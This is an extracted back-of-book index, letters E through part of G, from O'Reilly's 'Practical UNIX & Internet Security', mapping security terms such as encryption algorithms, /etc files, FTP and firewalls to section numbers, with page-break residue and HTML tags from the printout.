through log files : 18.4.2. Eavesdropping Through Log Files<br />

on the Web<br />

18.4. Avoiding the Risks of Eavesdropping<br />

18.4.2. Eavesdropping Through Log Files<br />

X clients : 17.3.21.2. X security<br />

ECB (electronic code book)<br />

6.4.4.2. DES modes<br />

6.6.2. des: The Data Encryption Standard<br />

echo command : 23.5. Tips on Using Passwords<br />

ECPA (Electronic Communications Privacy Act) : 26.2.3. Federal Computer Crime Laws<br />

editing wtmp file : 10.1.3.1. Pruning the wtmp file<br />

editors : 11.5.2.7. Other initializations<br />

buffers for : 11.1.4. Trojan Horses<br />

Emacs : 11.5.2.3. GNU .emacs<br />

ex<br />

5.5.3.2. Another SUID example: IFS and the /usr/lib/preserve hole<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_e.htm (1 of 10) [2002-04-12 10:43:45]


Index<br />

11.5.2.4. .exrc<br />

11.5.2.7. Other initializations<br />

startup file attacks : 11.5.2.4. .exrc<br />

vi<br />

5.5.3.2. Another SUID example: IFS and the /usr/lib/preserve hole<br />

11.5.2.4. .exrc<br />

11.5.2.7. Other initializations<br />

edquota command : 25.2.2.5. Using quotas<br />

EDS : F.3.4.11. EDS and EDS customers worldwide<br />

education : (see security, user awareness of)<br />

effective UIDs/GIDs<br />

4.3.1. Real and Effective UIDs<br />

5.5. SUID<br />

10.1.2.1. su command and /etc/utmp and /var/adm/wtmp files<br />

C.1.3.2. Process real and effective UID<br />

8mm video tape : 7.1.4. Guarding Against Media Failure<br />

electrical fires<br />

12.2.1.2. Smoke<br />

(see also fires; smoke and smoking)<br />

electrical noise : 12.2.1.8. Electrical noise<br />

electronic<br />

breakins : (see breakins; cracking)<br />

code book (ECB)<br />

6.4.4.2. DES modes<br />

6.6.2. des: The Data Encryption Standard<br />

mail : (see mail)<br />

Electronic Communications Privacy Act (ECPA) : 26.2.3. Federal Computer Crime Laws<br />

ElGamal algorithm<br />

6.4.2. Summary of Public Key Systems<br />

6.5.3. Digital Signatures<br />

elm (mail system) : 11.5.2.5. .forward, .procmailrc<br />

emacs editor : 11.5.2.7. Other initializations<br />

.emacs file : 11.5.2.3. GNU .emacs<br />

email : (see mail)<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_e.htm (2 of 10) [2002-04-12 10:43:45]


Index<br />

embedded commands : (see commands)<br />

embezzlers : 11.3. Authors<br />

emergency response organizations : (see response teams)<br />

employees<br />

11.3. Authors<br />

13. Personnel <strong>Sec</strong>urity<br />

13.3. Outsiders<br />

departure of : 13.2.6. Departure<br />

phonebook of : 12.3.3. Other Media<br />

security checklist for : A.1.1.12. Chapter 13: Personnel <strong>Sec</strong>urity<br />

targeted in legal investigation : 26.2.5. If You or One of Your Employees Is a Target of an<br />

Investigation...<br />

trusting : 27.3.1. Your Employees?<br />

written authorization for : 26.2.6. Other Tips<br />

encryption<br />

6.2. What Is Encryption?<br />

6.2.2. The Elements of Encryption<br />

12.2.6.2. Encryption<br />

(see also cryptography)<br />

algorithms : 2.5. The Problem with <strong>Sec</strong>urity Through Obscurity<br />

crypt<br />

6.6.1. <strong>UNIX</strong> crypt: The Original <strong>UNIX</strong> Encryption Command<br />

6.6.1.3. Example<br />

Digital Signature Algorithm<br />

6.4.2. Summary of Public Key Systems<br />

6.5.3. Digital Signatures<br />

ElGamal : 6.4.2. Summary of Public Key Systems<br />

IDEA : 6.4.1. Summary of Private Key Systems<br />

RC2, RC4, and RC5<br />

6.4.1. Summary of Private Key Systems<br />

6.4.8. Proprietary Encryption Systems<br />

ROT13 : 6.4.3. ROT13: Great for Encoding Offensive Jokes<br />

RSA<br />

6.4.2. Summary of Public Key Systems<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_e.htm (3 of 10) [2002-04-12 10:43:45]


Index<br />

6.4.6. RSA and Public Key Cryptography<br />

6.4.6.3. Strength of RSA<br />

application-level : 16.3.1. Link-level <strong>Sec</strong>urity<br />

of backups<br />

7.1.6.3. Data security for backups<br />

7.4.4. Encrypting Your Backups<br />

12.3.2.4. Backup encryption<br />

checklist for : A.1.1.5. Chapter 6: Cryptography<br />

Data Encryption Standard (DES)<br />

6.4.1. Summary of Private Key Systems<br />

6.4.4. DES<br />

6.4.5.2. Triple DES<br />

6.6.2. des: The Data Encryption Standard<br />

DCE and : 3.2.2. The /etc/passwd File and Network Databases<br />

Diffie-Hellman : (see Diffie-Hellman key exchange system)<br />

end-to-end : 16.3.1. Link-level <strong>Sec</strong>urity<br />

Enigma system<br />

6.3. The Enigma Encryption System<br />

6.6.1.1. The crypt program<br />

(see also crypt command/algorithm)<br />

escrowing keys<br />

6.1.3. Modern Controversy<br />

7.1.6.3. Data security for backups<br />

exporting software : 26.4.1. Munitions Export<br />

of hypertext links : 18.4.1. Eavesdropping Over the Wire<br />

laws about<br />

6.7. Encryption and U.S. Law<br />

6.7.2. Cryptography and Export Controls<br />

link-level : 16.3.1. Link-level <strong>Sec</strong>urity<br />

of modems : 14.6. Additional <strong>Sec</strong>urity for Modems<br />

Netscape Navigator system : 18.4.1. Eavesdropping Over the Wire<br />

with network services : 17.4. <strong>Sec</strong>urity Implications of Network Services<br />

one-time pad mechanism : 6.4.7. An Unbreakable Encryption Algorithm<br />

of passwords<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_e.htm (4 of 10) [2002-04-12 10:43:45]


Index<br />

8.6. The <strong>UNIX</strong> Encrypted Password System<br />

8.6.4. Crypt16() and Other Algorithms<br />

23.5. Tips on Using Passwords<br />

PGP : (see PGP)<br />

programs for <strong>UNIX</strong><br />

6.6. Encryption Programs Available for <strong>UNIX</strong><br />

6.6.3.6. PGP detached signatures<br />

proprietary algorithms : 6.4.8. Proprietary Encryption Systems<br />

RC4 and RC5 algorithms : 6.4.1. Summary of Private Key Systems<br />

references on : D.1.5. Cryptography Books<br />

Skipjack algorithm : 6.4.1. Summary of Private Key Systems<br />

superencryption : 6.4.5. Improving the <strong>Sec</strong>urity of DES<br />

and superusers : 6.2.4. Why Use Encryption with <strong>UNIX</strong>?<br />

of Web information : 18.4.1. Eavesdropping Over the Wire<br />

end-to-end encryption : 16.3.1. Link-level <strong>Sec</strong>urity<br />

Energy Sciences Network (ESnet) : F.3.4.43. U.S. Department of Energy sites, Energy Sciences Network<br />

(ESnet), and DOE contractors<br />

Enigma encryption system<br />

6.3. The Enigma Encryption System<br />

6.6.1.1. The crypt program<br />

Enterprise Networks : 16.1. Networking<br />

environment variables<br />

11.5.2.7. Other initializations<br />

23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

environment, physical<br />

12.2.1. The Environment<br />

12.2.1.13. Environmental monitoring<br />

erasing disks : 12.3.2.3. Sanitize your media before disposal<br />

erotica, laws governing : 26.4.5. Pornography and Indecent Material<br />

errno variable : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

errors : 7.1.1.1. A taxonomy of computer failures<br />

in ACLs : 5.2.5.1. AIX Access Control Lists<br />

configuration : 9.1. Prevention<br />

human : 7.1.4. Guarding Against Media Failure<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_e.htm (5 of 10) [2002-04-12 10:43:45]


Index<br />

errors<br />

Preface<br />

(see also auditing, system activity)<br />

escape sequences, modems and : 14.5.3.1. Originate testing<br />

escrowing encryption keys<br />

6.1.3. Modern Controversy<br />

7.1.6.3. Data security for backups<br />

ESnet (Energy Sciences Network) : F.3.4.43. U.S. Department of Energy sites, Energy Sciences Network<br />

(ESnet), and DOE contractors<br />

espionage : 11.3. Authors<br />

/etc directory<br />

11.1.2. Back Doors and Trap Doors<br />

11.5.3.5. System initialization files<br />

backups of : 7.1.3. Types of Backups<br />

/etc/aliases file : 11.5.3.3. /usr/lib/aliases, /etc/aliases, /etc/sendmail/aliases, aliases.dir, or<br />

aliases.pag<br />

/etc/default/login file : 8.5.1. <strong>Sec</strong>ure Terminals<br />

/etc/exports file<br />

11.6.1.2. Writable system files and directories<br />

19.3.2.4. Using <strong>Sec</strong>ure NFS<br />

making changes to : 20.2.1.2. /usr/etc/exportfs<br />

/etc/fbtab file : 17.3.21.1. /etc/fbtab and /etc/logindevperm<br />

/etc/fingerd program : (see finger command)<br />

/etc/fsck program : 24.4.1.7. Hidden files and directories<br />

/etc/fstab file<br />

11.1.2. Back Doors and Trap Doors<br />

19.3.2.5. Mounting a secure filesystem<br />

/etc/ftpd : (see ftpd server)<br />

/etc/ftpusers file : 17.3.2.5. Restricting FTP with the standard <strong>UNIX</strong> FTP server<br />

/etc/group file<br />

1.2. What Is an Operating System?<br />

4.1.3.1. The /etc/group file<br />

4.2.3. Impact of the /etc/passwd and /etc/group Files on <strong>Sec</strong>urity<br />

8.1.6. Group Accounts<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_e.htm (6 of 10) [2002-04-12 10:43:45]


Index<br />

/etc/halt command : 24.2.6. Anatomy of a Break-in<br />

/etc/hosts file : 16.2.3.1. The /etc/hosts file<br />

/etc/hosts.equiv : (see hosts.equiv file)<br />

/etc/hosts.lpd file : 17.3.18.6. /etc/hosts.lpd file<br />

/etc/inetd : (see inetd daemon)<br />

/etc/inetd.conf file : 17.3. Primary <strong>UNIX</strong> Network Services<br />

/etc/init program : C.5.1. Process #1: /etc/init<br />

/etc/inittab : (see inittab program)<br />

/etc/keystore file : 19.3.1.1. Proving your identity<br />

/etc/logindevperm file : 17.3.21.1. /etc/fbtab and /etc/logindevperm<br />

/etc/motd file : 26.2.6. Other Tips<br />

/etc/named.boot file<br />

17.3.6.1. DNS zone transfers<br />

17.3.6.2. DNS nameserver attacks<br />

/etc/passwd file<br />

1.2. What Is an Operating System?<br />

3.2.1. The /etc/passwd File<br />

3.2.2. The /etc/passwd File and Network Databases<br />

4.2.3. Impact of the /etc/passwd and /etc/group Files on <strong>Sec</strong>urity<br />

8.1.1. Accounts Without Passwords<br />

8.6. The <strong>UNIX</strong> Encrypted Password System<br />

C.5.1. Process #1: /etc/init<br />

+ in : (see NIS)<br />

accounts without passwords : 8.1.1. Accounts Without Passwords<br />

backing up : 7.1.2. What Should You Back Up?<br />

new accounts : 24.4.1. New Accounts<br />

NFS : 20.2.1.1. /etc/exports<br />

uucp user and : 15.1.4. How the UUCP Commands Work<br />

/etc/profile file<br />

11.5.2.1. .login, .profile, /etc/profile<br />

24.4.1.6. Changes to startup files<br />

/etc/publickey file : 19.3.2.1. Creating passwords for users<br />

/etc/rc directory<br />

11.5.3.5. System initialization files<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_e.htm (7 of 10) [2002-04-12 10:43:45]


Index<br />

17.1.2. Starting the Servers<br />

C.5.1. Process #1: /etc/init<br />

commenting out services : 17.3. Primary <strong>UNIX</strong> Network Services<br />

/etc/remote file<br />

10.3.1. aculog File<br />

14.5.1. Hooking Up a Modem to Your Computer<br />

/etc/renice : (see renice command)<br />

/etc/secure/passwd file : 8.1.1. Accounts Without Passwords<br />

/etc/security/passwd.adjunct file : 8.8.5. Shadow Password Files<br />

/etc/sendmail/aliases file : 11.5.3.3. /usr/lib/aliases, /etc/aliases, /etc/sendmail/aliases, aliases.dir, or<br />

aliases.pag<br />

/etc/services file : 17.1.1. The /etc/services File<br />

/etc/services file : 17.1.1. The /etc/services File<br />

/etc/shadow file<br />

8.1.1. Accounts Without Passwords<br />

8.8.5. Shadow Password Files<br />

/etc/shells file : 8.4.2. Changing the Account's Login Shell<br />

/etc/syslogd : (see syslog facility)<br />

/etc/tty file, backing up : 7.1.2. What Should You Back Up?<br />

/etc/ttys file<br />

8.5.1. <strong>Sec</strong>ure Terminals<br />

14.5.1. Hooking Up a Modem to Your Computer<br />

/etc/ttytab file : C.5.1. Process #1: /etc/init<br />

/etc/utmp file<br />

10.1.2. utmp and wtmp Files<br />

10.1.2.1. su command and /etc/utmp and /var/adm/wtmp files<br />

24.2.1. Catching One in the Act<br />

24.2.4. Tracing a Connection<br />

/etc/uucp directory : 15.4.2.1. Some bad examples<br />

/etc/yp/makedbm program : 19.4.4.1. Setting up netgroups<br />

in restricted filesystems : 8.1.5. Restricted Filesystem<br />

Ethernet : 16.1. Networking<br />

addresses for random seeds : 23.8. Picking a Random Seed<br />

cables : (see cables, network)<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_e.htm (8 of 10) [2002-04-12 10:43:45]


Index<br />

eavesdropping by : 12.3.1.2. Eavesdropping by Ethernet and 10Base-T<br />

Ethers table (NIS+) : 19.5.3. NIS+ Tables<br />

Euler Totient Function : 6.4.6.1. How RSA works<br />

eval function<br />

18.2.3.2. Testing is not enough!<br />

18.2.3.3. Sending mail<br />

evidence, equipment seized as : 26.2.4. Hazards of Criminal Prosecution<br />

ex editor<br />

5.5.3.2. Another SUID example: IFS and the /usr/lib/preserve hole<br />

11.5.2.4. .exrc<br />

11.5.2.7. Other initializations<br />

exceptions : C.2. Creating Processes<br />

exclamation mark (!) and mail command : 15.1.3. mail Command<br />

exclusive OR (XOR) : 6.4.7. An Unbreakable Encryption Algorithm<br />

exec (in Swatch program) : 10.6.2. The Swatch Configuration File<br />

exec system call<br />

5.1.7. File Permissions in Detail<br />

18.2.3.3. Sending mail<br />

23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

25.2.1.1. Too many processes<br />

ExecCGI option : 18.3.2. Commands Within the Block<br />

execl system call : 23.4. Tips on Writing SUID/SGID Programs<br />

execlp system call : 23.4. Tips on Writing SUID/SGID Programs<br />

execute permission<br />

5.1.7. File Permissions in Detail<br />

5.4. Using Directory Permissions<br />

execv system call : 23.4. Tips on Writing SUID/SGID Programs<br />

execve system call : 23.4. Tips on Writing SUID/SGID Programs<br />

execvp system call : 23.4. Tips on Writing SUID/SGID Programs<br />

expiring<br />

accounts : 8.4.3. Finding Dormant Accounts<br />

FTP depositories : 17.3.2.6. Setting up anonymous FTP with the standard <strong>UNIX</strong> FTP server<br />

passwords : 8.8.6. Password Aging and Expiration<br />

explosions : 12.2.1.5. Explosion<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_e.htm (9 of 10) [2002-04-12 10:43:45]


Index<br />

export laws : 26.4.1. Munitions Export<br />

cryptography<br />

6.4.4.1. Use and export of DES<br />

6.7.2. Cryptography and Export Controls<br />

exportfs command : 20.2.1.2. /usr/etc/exportfs<br />

exports file<br />

11.6.1.2. Writable system files and directories<br />

19.3.2.4. Using <strong>Sec</strong>ure NFS<br />

20.2.1.1. /etc/exports<br />

20.2.1.2. /usr/etc/exportfs<br />

.exrc file : 11.5.2.4. .exrc<br />

ext2 filesystem (Linux) : 25.2.2.6. Reserved space<br />

external data representation (XDR) : 19.2. Sun's Remote Procedure Call (RPC)<br />

extinguishers, fire : (see fires)<br />

extortion : 11.3. Authors<br />

Search | Symbols | A | B | C | D | E | F | G | H | I | J | K | L | M | N | O | P | Q | R | S | T | U | V | W | X | Y | Z<br />

Copyright © 1999 <strong>O'Reilly</strong> & Associates, Inc. All Rights Reserved.<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_e.htm (10 of 10) [2002-04-12 10:43:45]


Index<br />

Search | Symbols | A | B | C | D | E | F | G | H | I | J | K | L | M | N | O | P | Q | R | S | T | U | V | W | X | Y | Z<br />

Index: F<br />

factoring numbers<br />

6.4.6. RSA and Public Key Cryptography<br />

6.4.6.3. Strength of RSA<br />

(see also RSA algorithm)<br />

failed login attempts : (see logging in)<br />

failures, computer<br />

7.1.1.1. A taxonomy of computer failures<br />

23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

(see also bugs)<br />

fair use laws : 26.4.2. Copyright Infringement<br />

Fast Filesystem (FFS) : 25.2.2.6. Reserved space<br />

FBI (Federal Bureau of Investigation)<br />

26.2.2. Federal Jurisdiction<br />

F.3.2. Federal Bureau of Investigation (FBI)<br />

fbtab file : 17.3.21.1. /etc/fbtab and /etc/logindevperm<br />

Federal Information Processing Standard (FIPS) : 6.4.2. Summary of Public Key Systems<br />

federal law enforcement<br />

26.2.2. Federal Jurisdiction<br />

26.2.3. Federal Computer Crime Laws<br />

FFS (Fast File System) : 25.2.2.6. Reserved space<br />

fgets function : 23.1.1. The Lesson of the <strong>Internet</strong> Worm<br />

fiber optic cables : (see cables, network)<br />

File Handles : 20.1.2. File Handles<br />

File Transfer Protocol : (see FTP)<br />

filenames, attacks via : 11.5.1.4. Filename attacks<br />

files : 5.1. Files<br />

automatic directory listings : 18.2.2.2. Additional configuration issues<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_f.htm (1 of 7) [2002-04-12 10:43:46]


Index<br />

backing up<br />

7. Backups<br />

7.4.7. inode Modification Times<br />

automatic system for<br />

7.3.2. Building an Automatic Backup System<br />

18.2.3.5. Beware stray CGI scripts<br />

critical files<br />

7.3. Backing Up System Files<br />

7.3.2. Building an Automatic Backup System<br />

prioritizing : 7.3.1. What Files to Back Up?<br />

changing owner of : 5.7. chown: Changing a File's Owner<br />

context-dependent (CDFs)<br />

5.9.2. Context-Dependent Files<br />

24.4.1.7. Hidden files and directories<br />

core : C.4. The kill Command<br />

descriptors : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

detecting changes to<br />

9.2. Detecting Change<br />

9.3. A Final Note<br />

device : 5.6. Device Files<br />

downloading, logs of<br />

10.3.3. xferlog Log File<br />

10.3.5. access_log Log File<br />

finding all SUID/SGID<br />

5.5.4. Finding All of the SUID and SGID Files<br />

5.5.4.1. The ncheck command<br />

format, monitoring : 8.2. Monitoring File Format<br />

group-writable : 11.6.1.2. Writable system files and directories<br />

hidden : 24.4.1.7. Hidden files and directories<br />

hidden space : 25.2.2.7. Hidden space<br />

history : 10.4.1. Shell History<br />

immutable : 9.1.1. Immutable and Append-Only Files<br />

integrity of : (see integrity)<br />

intruder's changes to : 24.4.1.1. Changes in file contents<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_f.htm (2 of 7) [2002-04-12 10:43:46]


Index<br />

locating largest : 25.2.2.1. Disk-full attacks<br />

locking : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

log : (see log files)<br />

mail sent directly to : 15.7. Early <strong>Sec</strong>urity Problems with UUCP<br />

modification times of<br />

5.1.2. Inodes<br />

5.1.5. File Times<br />

7.4.7. inode Modification Times<br />

9.2.2. Checklists and Metadata<br />

network configuration : 10.4.3. Network Setup<br />

permissions to : (see permissions)<br />

remote access to<br />

15.4.1. USERFILE: Providing Remote File Access<br />

15.4.2.1. Some bad examples<br />

SGID bit on : 5.5.7. SGID Bit on Files (System V <strong>UNIX</strong> Only): Mandatory Record Locking<br />

startup<br />

11.5.2. Start-up File Attacks<br />

11.5.2.7. Other initializations<br />

system database : 1.2. What Is an Operating System?<br />

transfering between systems : 15.1.1. uucp Command<br />

types of : 5.1.6. Understanding File Permissions<br />

unowned : 24.4.1.8. Unowned files<br />

on Web servers : (see Web servers)<br />

world-writable : 11.6.1.1. World-writable user files and directories<br />

zero-filled bytes in : 7.4. Software for Backups<br />

filesystems : (see directories)<br />

filter files (mail) : 11.5.2.5. .forward, .procmailrc<br />

filters, air : 12.2.1.3. Dust<br />

find command<br />

5.5.4. Finding All of the SUID and SGID Files<br />

11.5.1.4. Filename attacks<br />

-H option : 5.9.2. Context-Dependent Files<br />

-ls option : 9.2.2.1. Simple listing<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_f.htm (3 of 7) [2002-04-12 10:43:46]


Index<br />

-size option : 25.2.2.1. Disk-full attacks<br />

-H option : 24.4.1.7. Hidden files and directories<br />

-print option : 5.5.4. Finding All of the SUID and SGID Files<br />

type -f option : 5.5.4. Finding All of the SUID and SGID Files<br />

-xdev option : 5.5.4. Finding All of the SUID and SGID Files<br />

finger command<br />

8.1.3. Accounts That Run a Single Command<br />

10.1.1. lastlog File<br />

10.1.2. utmp and wtmp Files<br />

15.3.1. Assigning Additional UUCP Logins<br />

15.4.3. L.cmds: Providing Remote Command Execution<br />

17.3.4.3. Improving the security of Berkeley sendmail V8<br />

17.3.8. finger (TCP Port 79)<br />

17.3.8.3. Replacing finger<br />

21.4.4.1. Creating an ftpout account to allow FTP without proxies.<br />

23.1.1. The Lesson of the <strong>Internet</strong> Worm<br />

24.2.1. Catching One in the Act<br />

24.2.4.2. How to contact the system administrator of a computer you don't know<br />

(see also <strong>Internet</strong>, Worm program)<br />

disabling : 17.3.8.2. Disabling finger<br />

FIPS (Federal Information Processing Standard) : 6.4.2. Summary of Public Key Systems<br />

fired employees : 13.2.6. Departure<br />

fires<br />

12.2.1.1. Fire<br />

12.2.1.2. Smoke<br />

12.4.1.1. Fire hazards<br />

extinguishers and radio transmitters : 12.2.1.8. Electrical noise<br />

firewalls<br />

8.8.9. Account Names Revisited: Using Aliases for Increased <strong>Sec</strong>urity<br />

17.2. Controlling Access to Servers<br />

21. Firewalls<br />

21.4.2. Electronic Mail<br />

21.5. Special Considerations<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_f.htm (4 of 7) [2002-04-12 10:43:46]


Index<br />

checklist for : A.1.1.20. Chapter 21: Firewalls<br />

mailing list for<br />

E.1.3.1. Academic-Firewalls<br />

E.1.3.7. Firewalls<br />

nameservers and : 17.3.6.2. DNS nameserver attacks<br />

for NIS sites : 19.4.5. Unintended Disclosure of Site Information with NIS<br />

portmapper program and : 19.2.1. Sun's portmap/rpcbind<br />

for specific network services : G. Table of IP Services<br />

FIRST teams<br />

24.6. Resuming Operation<br />

E.3.3. FIRST<br />

Fitzgerald, Tom : 22.5. UDP Relayer<br />

flooding<br />

client : 16.3.2. <strong>Sec</strong>urity and Nameservice<br />

messages : 25.3.2. Message Flooding<br />

servers with requests : 25.3.1. Service Overloading<br />

water : (see water)<br />

floors, raised : 12.2.3.1. Raised floors and dropped ceilings<br />

floppy disks : (see backups; media)<br />

folders : (see directories)<br />

FollowSymLinks option : 18.3.2. Commands Within the Block<br />

food : 12.2.2.1. Food and drink<br />

fork command<br />

23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

25.2.1.1. Too many processes<br />

C.2. Creating Processes<br />

format<br />

file, monitoring : 8.2. Monitoring File Format<br />

redoing as destructive attack : 25.1. Destructive Attacks<br />

USERFILE entries : 15.4.1.3. Format of USERFILE entry without system name<br />

.forward file<br />

11.5.2.5. .forward, .procmailrc<br />

21.4.2. Electronic Mail<br />

24.4.1.6. Changes to startup files<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_f.htm (5 of 7) [2002-04-12 10:43:46]


Index<br />

Frame Ground (FG) : 14.3. The RS-232 Serial Protocol<br />

fraud<br />

14.4.1. One-Way Phone Lines<br />

26.2.2. Federal Jurisdiction<br />

fscanf function : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

fsck program<br />

24.4.1.7. Hidden files and directories<br />

25.2.2.8. Tree-structure attacks<br />

fsirand command : 20.4.8. Use fsirand<br />

fstab file<br />

11.1.2. Back Doors and Trap Doors<br />

19.3.2.5. Mounting a secure filesystem<br />

FTP (File Transfer Protocol)<br />

17.3.2. (FTP) File Transfer Protocol (TCP Ports 20 and 21)<br />

17.3.2.7. Allowing only FTP access<br />

anonymous<br />

4.1. Users and Groups<br />

17.3.2.1. Using anonymous FTP<br />

17.3.2.6. Setting up anonymous FTP with the standard <strong>UNIX</strong> FTP server<br />

anonymous<br />

and HTTP : 18.2.4.1. Beware mixing HTTP with anonymous FTP<br />

~ftp/bin directory : 17.3.2.6. Setting up anonymous FTP with the standard <strong>UNIX</strong> FTP server<br />

~ftp/etc directory : 17.3.2.6. Setting up anonymous FTP with the standard <strong>UNIX</strong> FTP server<br />

~ftp/pub directory : 17.3.2.6. Setting up anonymous FTP with the standard <strong>UNIX</strong> FTP server<br />

logging transferred files : 10.3.3. xferlog Log File<br />

passive mode<br />

17.3.2.2. Passive vs. active FTP<br />

17.3.2.3. FTP passive mode<br />

setting up server<br />

17.3.2.4. Setting up an FTP server<br />

17.3.2.6. Setting up anonymous FTP with the standard <strong>UNIX</strong> FTP server<br />

ftp account : (see anonymous FTP)<br />

ftpd server<br />

8.4.2. Changing the Account's Login Shell<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_f.htm (6 of 7) [2002-04-12 10:43:46]


Index<br />

11.1.2. Back Doors and Trap Doors<br />

17.3.2. (FTP) File Transfer Protocol (TCP Ports 20 and 21)<br />

17.3.2.4. Setting up an FTP server<br />

for backups : 7.4.5. Backups Across the Net<br />

security hole : 6.5.2. Using Message Digests<br />

UUCP enabled on : 15.8. UUCP Over Networks<br />

ftpout account, firewalls : 21.4.4.1. Creating an ftpout account to allow FTP without proxies.<br />

ftpusers file : 17.3.2.5. Restricting FTP with the standard <strong>UNIX</strong> FTP server<br />

ftruncate system call : 5.1.7. File Permissions in Detail<br />

full backups : 7.1.3. Types of Backups<br />

function keys : 12.3.4.5. Function keys<br />

functionality, add-on : 1.4.3. Add-On Functionality Breeds Problems<br />

Search | Symbols | A | B | C | D | E | F | G | H | I | J | K | L | M | N | O | P | Q | R | S | T | U | V | W | X | Y | Z<br />

Copyright © 1999 <strong>O'Reilly</strong> & Associates, Inc. All Rights Reserved.<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_f.htm (7 of 7) [2002-04-12 10:43:46]


Index<br />

Search | Symbols | A | B | C | D | E | F | G | H | I | J | K | L | M | N | O | P | Q | R | S | T | U | V | W | X | Y | Z<br />

Index: G<br />

games<br />

8.1.4. Open Accounts<br />

17.3.23. Other TCP Ports: MUDs and <strong>Internet</strong> Relay Chat (IRC)<br />

gas, natural : 12.2.1.5. Explosion<br />

gated deamon : 17.3.19. Routing <strong>Internet</strong> Protocol (RIP routed) (UDP Port 520)<br />

gateways : 16.2.2. Routing<br />

gcore program : C.4. The kill Command<br />

GCT tool : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

gdb debugger : C.4. The kill Command<br />

GECOS (or GCOS) : 3.2.1. The /etc/passwd File<br />

Geer, Dan : 27.2.6. Network Providers that Network Too Well<br />

General Electric Company : F.3.4.13. General Electric<br />

generating<br />

passwords automatically : 8.8.4. Password Generators<br />

random numbers : 23.6. Tips on Generating Random Numbers<br />

German government institutions : F.3.4.25. Netherlands: SURFnet-connected sites<br />

gethostbyaddresses function : 16.2.6.1. DNS under <strong>UNIX</strong><br />

gethostbyname function : 16.2.6.1. DNS under <strong>UNIX</strong><br />

getopt function : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

getpass function<br />

23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

23.5. Tips on Using Passwords<br />

getpwuid function : 19.4.1. Including or excluding specific accounts:<br />

gets function : 23.1.1. The Lesson of the <strong>Internet</strong> Worm<br />

getservicebyname function : 17.1.1. The /etc/services File<br />

getstats program : 10.3.5. access_log Log File<br />

getty program : C.5.2. Logging In<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_g.htm (1 of 3) [2002-04-12 10:43:46]


Index<br />

GIDs (group identifiers)<br />

1.4.3. Add-On Functionality Breeds Problems<br />

4.1.3. Groups and Group Identifiers (GIDs)<br />

4.1.3.3. Groups and BSD or SVR4 <strong>UNIX</strong><br />

real versus effective : 4.3.1. Real and Effective UIDs<br />

GIP RENATER : F.3.4.12. France: universities, Ministry of Research and Education in France, CNRS,<br />

CEA, INRIA, CNES, INRA, IFREMER, and EDF<br />

glass walls : 12.2.3.3. Glass walls<br />

GNU Emacs : 11.5.2.3. GNU .emacs<br />

GNU utilities : 23.1.2.1. What they found<br />

Goldman, Sachs, and Company : F.3.4.38. U.K. JANET network<br />

granularity, time : 23.8. Picking a Random Seed<br />

grounding signals : 25.3.3. Signal Grounding<br />

group disk quotas : 25.2.2.5. Using quotas<br />

group file<br />

1.2. What Is an Operating System?<br />

4.1.3.1. The /etc/group file<br />

4.2.3. Impact of the /etc/passwd and /etc/group Files on <strong>Sec</strong>urity<br />

8.1.6. Group Accounts<br />

group IDs : (see GIDs)<br />

Group table (NIS+) : 19.5.3. NIS+ Tables<br />

groups<br />

4.1.3. Groups and Group Identifiers (GIDs)<br />

4.1.3.3. Groups and BSD or SVR4 <strong>UNIX</strong><br />

accounts for : 8.1.6. Group Accounts<br />

changing : 5.8. chgrp: Changing a File's Group<br />

checklist for : A.1.1.3. Chapter 4: Users, Groups, and the Superuser<br />

files writable by : 11.6.1.2. Writable system files and directories<br />

identifiers for : (see GIDs)<br />

NIS netgroups<br />

19.4.4. NIS Netgroups<br />

19.4.4.6. NIS is confused about "+"<br />

umask for group projects : 5.3.1. The umask Command<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_g.htm (2 of 3) [2002-04-12 10:43:46]


Index<br />

wheel : (see wheel group)<br />

grpck command : 8.2. Monitoring File Format<br />

